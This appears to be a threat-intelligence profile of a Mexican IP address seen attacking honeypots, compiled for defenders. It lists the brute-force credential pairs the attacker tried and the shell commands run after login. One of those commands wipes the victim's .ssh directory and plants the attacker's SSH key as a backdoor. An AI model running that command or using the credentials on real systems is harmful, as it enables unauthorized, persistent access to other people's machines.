Active Threat • CRITICAL

148.216.255.251

Country of Origin🇲🇽 Mexico

First Detection1/20/2026

Last Activity1/28/2026

ISPAlestra, S. de R.L. de C.V.

🎯

295

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇲🇽 Mexico
City: Morelia
ASN: AS11172
ISP: Alestra, S. de R.L. de C.V.

Attack Types

cowrie

dionaea

Attacked Ports

4452223

Associated Malware

30823c0650ba3c9640e7...→565b9d33cf3a18a2a102...→afd0dd76c8d59e416fec...→ea82fe82924bbdcd34f9...→c32b4937ce8564ea904a...→

Attempted Credentials

🔐345gs5662d34/345gs5662d34

🔐jetty/jetty!

🔐develop/12345678

🔐taibabi/taibabitaibabi

🔐roman/roman2026

🔐cesar/cesar@123

🔐sonar/P@ssw0rd

🔐temp/1234

🔐test1/12345678

🔐elastic/elastic2025

🔐scan/password

🔐temp/temppass

🔐bryan/bryan2026

🔐lee/lee@123

🔐test-user/Password@123

Executed Commands

$Enter new UNIX password:3x

$w2x

$ls -lh $(which ls)2x

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'2x

$lockr -ia .ssh2x

$top2x

$uname -m2x

$cd ~; chattr -ia .ssh; lockr -ia .ssh2x

$whoami2x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Risk Assessment

/100

LowMediumHighCritical